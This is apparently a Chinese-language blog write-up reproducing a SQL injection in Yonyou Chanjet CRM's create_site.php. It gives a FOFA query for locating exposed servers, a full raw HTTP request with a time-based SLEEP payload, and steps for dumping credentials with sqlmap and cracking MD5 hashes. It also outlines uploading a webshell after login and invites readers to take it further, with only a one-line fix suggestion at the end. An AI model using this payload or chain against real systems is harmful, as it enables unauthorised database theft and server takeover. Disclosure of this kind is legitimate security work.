用友畅捷通CRM SQL注入漏洞复现

0x01 产品简介

      用友畅捷通CRM是面向小企业全力打造的简单、实用的客户关系管理应用。帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为,促进团队销售能力的提升;通过查询和分析,识别企业的价值客户,融合电话、短信、邮件等工具,实现精准营销;帮助企业实现客户智慧经营。

0x02 漏洞概述

    用友畅捷CRM create_site.php处存在SQL时间盲注 未对后台功能做有效的身份认证与用户的输入进行安全过滤,导致在权限绕过可直接访问后台存在SQL注入漏洞的缺陷路径。攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。

0x03 复现环境

   FOFA:app="畅捷通-畅捷CRM"

用友畅捷通CRM SQL注入漏洞复现_第1张图片

 0x04 漏洞复现

 验证漏洞是否存在

/WebSer~1/create_site.php?site_id=1

用友畅捷通CRM SQL注入漏洞复现_第2张图片

出现以上弹窗内容,证明漏洞存在

构造延时注入payload

GET /WebSer~1/create_site.php?site_id=1+AND+%28SELECT+6663+FROM+%28SELECT%28SLEEP%285%29%29%29Jdzn%29 HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0

用友畅捷通CRM SQL注入漏洞复现_第3张图片

 通过sqlmap爆破数据库

用友畅捷通CRM SQL注入漏洞复现_第4张图片

爆破表名

用友畅捷通CRM SQL注入漏洞复现_第5张图片

爆破字段名

用友畅捷通CRM SQL注入漏洞复现_第6张图片

爆破字段内容(登录页面用户名密码)

用友畅捷通CRM SQL注入漏洞复现_第7张图片

用友畅捷通CRM SQL注入漏洞复现_第8张图片

 通过MD5解密即可得到密码,登录系统近一步利用(点到为止,这里就不展示了,各位随意发挥)

后利用思路:

登录后台→点击客户功能→新建客户→附件→新建附件→上传webshell。

 0x05 修复建议

     畅捷通CRM版本官方已经不再维护,建议受影响的用户收敛系统仅内网访问或部署WAF

你可能感兴趣的:(漏洞复现,web安全,安全,网络安全)